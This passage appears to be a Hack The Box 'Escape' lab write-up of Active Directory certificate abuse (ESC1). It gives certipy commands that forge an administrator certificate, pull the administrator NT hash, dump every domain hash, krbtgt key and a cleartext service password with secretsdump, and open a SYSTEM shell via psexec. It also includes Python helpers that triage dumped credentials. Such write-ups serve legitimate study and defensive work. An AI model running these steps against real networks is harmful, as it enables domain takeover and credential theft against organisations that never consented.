Requesting Certificate with Impersonation


Since the Enrollment Rights on the template are granted to the Domain Users group and the template lets the enrollee supply the subject (the ESC1 condition this request relies on), any domain user's credential will do. Certify.exe can request a certificate for another principal with its /altname parameter, but since I'm working from Kali with a Kerberos ticket for Ryan.Cooper, certipy is the natural choice: it takes the alternate identity directly with -upn.

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=../Ryan.Cooper.ccache certipy req -target dc.sequel.htb -k -no-pass -ca sequel-DC-CA -template 'UserAuthentication' -upn administrator@sequel.htb -dns-tcp -ns $IP -dc-ip $IP -debug
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[+] domain retrieved from ccache: SEQUEL.HTB
[+] username retrieved from ccache: Ryan.Cooper
[+] Trying to resolve 'dc.sequel.htb' at '10.10.11.202'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] using kerberos cache: ../Ryan.Cooper.ccache
[+] Using TGT from cache
[+] username retrieved from ccache: Ryan.Cooper
[+] Getting TGS for 'host/dc.sequel.htb'
[+] Got TGS for 'host/dc.sequel.htb'
[+] trying to connect to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[+] connected to endpoint: ncacn_np:10.10.11.202[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 13
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

I request the certificate as Ryan.Cooper but set the UPN in the subject alternative name to administrator@sequel.htb, which is the identity the KDC will map the certificate to. certipy can also set the subject DN with `-subject 'CN=Administrator,CN=Users,DC=sequel,DC=htb'`, but that is cosmetic for authentication; the SAN UPN is what does the impersonation. Note the "Certificate has no object SID" line: the issued certificate lacks the szOID_NTDS_CA_SECURITY_EXT extension (1.3.6.1.4.1.311.25.2) that KB5014754 introduced to bind a certificate to an account SID. A KDC in Full Enforcement mode (StrongCertificateBindingEnforcement = 2) refuses to map a UPN-only certificate like this one, so the fact that the TGT request succeeds is itself evidence that the DC is not enforcing strong certificate mapping.
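To make the mapping concrete, here is an added example (my own code, not part of the writeup or of certipy) that hand-encodes and then parses the two X.509 structures the KDC consults when it maps a PKINIT certificate to an account: the SAN otherName UPN that `-upn` puts in the request, and the Microsoft SID security extension that certipy reported as missing. The DER encoder and walker are minimal by design; the sample UPN and SID are constructed, and the SID extension layout (an otherName with type-id 1.3.6.1.4.1.311.25.2.1 wrapping an OCTET STRING holding the SID string) and the `kdc_accepts` rule are simplified assumptions about Microsoft's behaviour, not the KDC's full logic.

```python
# Added example: build and inspect the SAN UPN and the SID security extension
# a KDC uses for certificate-to-account mapping. Hand-rolled DER, no deps.
OID_UPN = "1.3.6.1.4.1.311.20.2.3"                 # szOID_NT_PRINCIPAL_NAME
OID_NTDS_CA_SECURITY_EXT = "1.3.6.1.4.1.311.25.2"  # extension OID from KB5014754
OID_NTDS_OBJECTSID = "1.3.6.1.4.1.311.25.2.1"      # otherName type-id carrying the SID
TAG_SEQUENCE, TAG_OID, TAG_OCTET, TAG_UTF8, TAG_CTX0 = 0x30, 0x06, 0x04, 0x0C, 0xA0


def _der_len(n: int) -> bytes:
    """DER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, body: bytes) -> bytes:
    return bytes([tag]) + _der_len(len(body)) + body


def encode_oid(dotted: str) -> bytes:
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:                  # base-128, high bit set on all but the last byte
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return tlv(TAG_OID, bytes(out))


def decode_oid(body: bytes) -> str:
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def read_tlv(buf: bytes, i: int = 0):
    """Return (tag, body, index_after) for the TLV starting at buf[i]."""
    tag, length, i = buf[i], buf[i + 1], i + 2
    if length & 0x80:
        n = length & 0x7F
        length, i = int.from_bytes(buf[i:i + n], "big"), i + n
    return tag, buf[i:i + length], i + length


def other_name(type_oid: str, value_tlv: bytes) -> bytes:
    """GeneralName otherName: [0] { type-id OID, value [0] EXPLICIT ANY }."""
    return tlv(TAG_CTX0, encode_oid(type_oid) + tlv(TAG_CTX0, value_tlv))


def build_san_with_upn(upn: str) -> bytes:
    """subjectAltName extnValue with one UPN otherName: the enrollee-supplied SAN of ESC1."""
    return tlv(TAG_SEQUENCE, other_name(OID_UPN, tlv(TAG_UTF8, upn.encode())))


def build_sid_extension(sid: str) -> bytes:
    """szOID_NTDS_CA_SECURITY_EXT extnValue (assumed layout): SID string in an OCTET STRING otherName."""
    return tlv(TAG_SEQUENCE, other_name(OID_NTDS_OBJECTSID, tlv(TAG_OCTET, sid.encode())))


def find_other_names(der: bytes) -> dict:
    """Walk any DER blob and collect {type-id OID: raw value bytes} for every otherName."""
    found = {}

    def walk(buf: bytes):
        i = 0
        while i < len(buf):
            tag, body, i = read_tlv(buf, i)
            if tag == TAG_CTX0 and body and body[0] == TAG_OID:   # otherName shape
                _, oid_body, j = read_tlv(body)
                _, wrapper, _ = read_tlv(body, j)                 # [0] EXPLICIT wrapper
                _, value, _ = read_tlv(wrapper)
                found[decode_oid(oid_body)] = value
            elif tag & 0x20:                                      # constructed: descend
                walk(body)

    walk(der)
    return found


def inspect_mapping(san_der: bytes, sid_ext_der: bytes = b"") -> dict:
    """What the KDC sees: the UPN it maps on, and whether a SID binds the cert to one object."""
    upn = find_other_names(san_der).get(OID_UPN, b"").decode()
    sid = find_other_names(sid_ext_der).get(OID_NTDS_OBJECTSID, b"").decode() if sid_ext_der else ""
    return {"upn": upn, "sid": sid or None}


def kdc_accepts(info: dict, strong_binding_enforcement: int) -> bool:
    """Simplified KB5014754 rule (assumption): SID-bound certs are accepted; UPN-only certs
    are accepted unless StrongCertificateBindingEnforcement is 2 (Full Enforcement)."""
    return info["sid"] is not None or strong_binding_enforcement < 2


if __name__ == "__main__":
    san = build_san_with_upn("administrator@sequel.htb")          # what the writeup's request carried
    weak = inspect_mapping(san)
    strong = inspect_mapping(san, build_sid_extension("S-1-5-21-1-2-3-500"))  # constructed SID
    print(weak, kdc_accepts(weak, 2))
    print(strong, kdc_accepts(strong, 2))
```

Run it and the UPN-only case (the certificate actually issued above) is rejected by the modelled Full Enforcement KDC while the SID-bound one passes; on a DC still in compatibility mode both map, which is what the successful `certipy auth` below demonstrates.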

┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ certipy auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip $IP             
Certipy v4.7.0 - by Oliver Lyak (ly4k)
 
[*] using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

While holding the administrator's PFX opens many avenues (it is a reusable credential that stays valid for the certificate's lifetime, independent of password changes), the simplest use is certipy auth: it authenticates to the KDC with PKINIT, receives a TGT for administrator, and then recovers the account's NT hash from the PAC_CREDENTIAL_INFO structure the KDC includes on PKINIT logons.

At this point, I can use the administrator TGT (or the NT hash) to dump every hash in the domain or open a shell on the DC. Two things to read carefully in the dump that follows: the "local SAM" Administrator on a DC is the DSRM account, so its hash differs from the domain Administrator hash in the NTDS section, and the LSA secrets include the MSSQL service configuration, which yields the sql_svc password in cleartext.

Hashdump


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=administrator.ccache impacket-secretsdump SEQUEL.HTB/@dc.sequel.htb -no-pass -k -target-ip $IP -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cbf36a6101cb1a15e11f776ec6d5d77b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
sequel\DC$:plain_password_hex:987044f12976a4e2ae7d7dc4ae7b1367074da5cc5f494001daa50ff52a97dd80b6830b5bc2e43d492a6889396d3b4bef4053c14d570cff18f319093cefeecda949d1035005e4e238a88ba2187ce62cde00c27ca3446c4b119119a27d56018a8d086998bfa48550c5a52e3ad5a415849522a3d6567482f2d694fdd4a02fae57bd6d515ceaedb44dd8aa6ab4d8e87a7abd85378d4c2253652af0eb74cec4777684a6b53fbc16ec4e3b289a93858c3a00703b472354a5e6cb97089dfc6d79e42cc49fabfc8fe08957ba10a7de4c3eabb9ce7011eadb308443277b45deac76ee0e79bfd602e3ccfef45d3c8bb64af35516fe
sequel\DC$:aad3b435b51404eeaad3b435b51404ee:a97d08b92c4846dcf059c935598be875:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM 
 0000   31 BF AC 76 98 3E CF 4A  FC BD AD 0F 17 0F 49 E7   1..v.>.J......I.
 0010   DA 65 A6 F9 C7 D4 FA 92  0E 5C 60 74 E6 67 BE A7   .e.......\`t.g..
 0020   88 14 9D 4D E5 A5 3A 63  E4 88 5A AC 37 C7 1B F9   ...M..:c..Z.7...
 0030   53 9C C1 D1 6F 63 6B D1  3F 77 F4 3A 32 54 DA AC   S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] _SC_MSSQL$SQLMOCK 
sequel\sql_svc:REGGIE1234ronnie
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
Tom.Henn:1103:aad3b435b51404eeaad3b435b51404ee:22e99d2b3043bbb0a480705c9b0e71ac:::
Brandon.Brown:1104:aad3b435b51404eeaad3b435b51404ee:f562f509ad646c666f83b45f90a58af3:::
Ryan.Cooper:1105:aad3b435b51404eeaad3b435b51404ee:98981eed8e9ce0763bb3c5b3c7ed5945:::
sql_svc:1106:aad3b435b51404eeaad3b435b51404ee:1443ec19da4dac4ffc953bca1b57b4cf:::
James.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:cc69ea05e9ab430702679d5706b39075:::
Nicole.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:235da7fbef7d0861301b4078d56afdc5:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:a97d08b92c4846dcf059c935598be875:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0ba0bb35571c5d0e19849c9c2b92539a4ce6a8fd3dd6348fb6a0888797dedd16
Administrator:aes128-cts-hmac-sha1-96:37cbf2133cdec2b7e5531957a21e791f
Administrator:des-cbc-md5:5d76e0d3c245a2a4
krbtgt:aes256-cts-hmac-sha1-96:b3f74f6e968fb5d2cf17f36f417bc46259623626953ed30f8faf3cd00b91c8de
krbtgt:aes128-cts-hmac-sha1-96:919e6861b6306e3367a9223a154473ec
krbtgt:des-cbc-md5:6d1f1cd391e01a91
Tom.Henn:aes256-cts-hmac-sha1-96:bb3886d7e3201d11055cf8a2ef587d83b448d33d77aab36dd84b4ce8c59fc0a2
Tom.Henn:aes128-cts-hmac-sha1-96:0a221bf0f01f109c86cc1668783b80d3
Tom.Henn:des-cbc-md5:1a46dc3858150401
Brandon.Brown:aes256-cts-hmac-sha1-96:1aad383c76610c43bf638873ff5d7f0d7cd5cffccdfb6dd16754f15b83217550
Brandon.Brown:aes128-cts-hmac-sha1-96:cb92957a61468212c2e1f26f2958b892
Brandon.Brown:des-cbc-md5:91b3a13edf6e6201
Ryan.Cooper:aes256-cts-hmac-sha1-96:b9a2b7df6161b9a31a15cfbbb17f68a5b3904eaa2ea21d8ed2ef9acb5e27b997
Ryan.Cooper:aes128-cts-hmac-sha1-96:cbe89554da97001fa8fd0967f1799104
Ryan.Cooper:des-cbc-md5:f4a445754f540104
sql_svc:aes256-cts-hmac-sha1-96:bcbbff82091c7c6f9875261d3ada97274d01b4a1f93ceb16e8154606e392a4ae
sql_svc:aes128-cts-hmac-sha1-96:decddf91c717c5a5b84e112f576ece3b
sql_svc:des-cbc-md5:73ae15efdafe751f
James.Roberts:aes256-cts-hmac-sha1-96:d503bb2c7eea7bf50e7f68ca967e4a6f8a903b22cffa07cf2c160580156f8a43
James.Roberts:aes128-cts-hmac-sha1-96:33c8d3d907cd51ffa5274ce0b16ba448
James.Roberts:des-cbc-md5:e53de99770a20bf2
Nicole.Thompson:aes256-cts-hmac-sha1-96:fd75cd1b02ed4cb838c996db6d7616157d19545c60fb23156abdb3a400bc371c
Nicole.Thompson:aes128-cts-hmac-sha1-96:0c86380c787deb624027e9d1d8d71ab2
Nicole.Thompson:des-cbc-md5:31b5e386b33e2589
DC$:aes256-cts-hmac-sha1-96:90b5a02c4064bd67238871f843e5d4e5814e4a7c9cab42616ec43f9b11a8176e
DC$:aes128-cts-hmac-sha1-96:351e6337a2b6a7468d15eb5ab29ea2dd
DC$:des-cbc-md5:d91a19515245f85e
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain Level Compromise
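Triage of a dump like the one above is where a practitioner turns output into next steps, so here is an added example (my own code, not from the writeup or from impacket) that parses impacket-secretsdump output into per-section records and flags the items that matter: the DSRM-versus-domain Administrator mismatch, accounts with an empty-password NT hash, the krbtgt material, and cleartext service credentials from LSA secrets. `SAMPLE` is a constructed subset of the output above, and the triage rules are my own choices.

```python
import re

# Added example: parse secretsdump output and flag what matters for the next step.
# SAMPLE is a constructed subset of a real dump; hashes are as printed by the tool.
SAMPLE = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cbf36a6101cb1a15e11f776ec6d5d77b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping LSA Secrets
[*] _SC_MSSQL$SQLMOCK 
sequel\\sql_svc:REGGIE1234ronnie
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:170710980002a95bc62d176f680a5b40:::
sql_svc:1106:aad3b435b51404eeaad3b435b51404ee:1443ec19da4dac4ffc953bca1b57b4cf:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:0ba0bb35571c5d0e19849c9c2b92539a4ce6a8fd3dd6348fb6a0888797dedd16
krbtgt:aes256-cts-hmac-sha1-96:b3f74f6e968fb5d2cf17f36f417bc46259623626953ed30f8faf3cd00b91c8de
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password
HASH_LINE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")
KEY_LINE = re.compile(r"^([^:\s]+):(aes256-cts-hmac-sha1-96|aes128-cts-hmac-sha1-96|des-cbc-md5):([0-9a-f]+)$")
SC_LINE = re.compile(r"^\[\*\] _SC_(\S+)\s*$")          # service-config secret header
CRED_LINE = re.compile(r"^([^:\\]+)\\([^:]+):(.*)$")     # domain\account:password


def parse_secretsdump(text: str) -> dict:
    """Split the dump into SAM, NTDS, Kerberos keys and service credentials."""
    out = {"sam": {}, "ntds": {}, "kerberos": {}, "services": {}}
    section, pending_service = None, None
    for line in text.splitlines():
        if line.startswith("[*] Dumping local SAM"):
            section = "sam"
        elif line.startswith("[*] Dumping LSA Secrets"):
            section = "lsa"
        elif line.startswith("[*] Dumping Domain Credentials"):
            section = "ntds"
        elif line.startswith("[*] Kerberos keys grabbed"):
            section = "kerberos"
        elif section in ("sam", "ntds") and (m := HASH_LINE.match(line)):
            user, rid, _lm, nt = m.groups()
            out[section][user] = {"rid": int(rid), "nt": nt}
        elif section == "kerberos" and (m := KEY_LINE.match(line)):
            out["kerberos"].setdefault(m.group(1), {})[m.group(2)] = m.group(3)
        elif section == "lsa" and (m := SC_LINE.match(line)):
            pending_service = m.group(1)               # the credential is on the next line
        elif section == "lsa" and pending_service and (m := CRED_LINE.match(line)):
            out["services"][pending_service] = {
                "account": f"{m.group(1)}\\{m.group(2)}", "password": m.group(3)}
            pending_service = None
    return out


def triage(dump: dict) -> list:
    """Findings a pentester acts on; rules are this example's own, not impacket's."""
    findings = []
    sam_admin, dom_admin = dump["sam"].get("Administrator"), dump["ntds"].get("Administrator")
    if sam_admin and dom_admin and sam_admin["nt"] != dom_admin["nt"]:
        findings.append("DSRM: local SAM Administrator on the DC differs from domain Administrator")
    for user, rec in dump["ntds"].items():
        if rec["nt"] == EMPTY_NT:
            findings.append(f"EMPTY_PASSWORD: {user}")
    if "krbtgt" in dump["ntds"]:
        findings.append("KRBTGT: hash and keys available, golden tickets can be forged")
    for svc, rec in dump["services"].items():
        findings.append(f"CLEARTEXT: {rec['account']} ({svc}) = {rec['password']}")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_secretsdump(SAMPLE)):
        print(finding)
```

Feed it the full dump (`python3 triage.py < dump.txt` after swapping `SAMPLE` for `sys.stdin.read()`) and the DSRM, krbtgt and cleartext sql_svc findings above fall out directly; the parser ignores the hex dumps and machine-account secrets because none of them match the credential pattern.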

Shell drop


┌──(kali㉿kali)-[~/…/htb/labs/escape/ADCS]
└─$ KRB5CCNAME=administrator.ccache impacket-psexec SEQUEL.HTB/@dc.sequel.htb -no-pass -k -target-ip $IP -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
[*] Requesting shares on 10.10.11.202.....
[*] Found writable share ADMIN$
[*] Uploading file RAlWWtaR.exe
[*] Opening SVCManager on 10.10.11.202.....
[*] Creating service lQKn on 10.10.11.202.....
[*] Starting service lQKn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
dc
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::21c
   IPv6 Address. . . . . . . . . . . : dead:beef::31e1:eb54:2784:d5cd
   Link-local IPv6 Address . . . . . : fe80::31e1:eb54:2784:d5cd%4
   IPv4 Address. . . . . . . . . . . : 10.10.11.202
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:f330%4
                                       10.10.10.2

System Level Compromise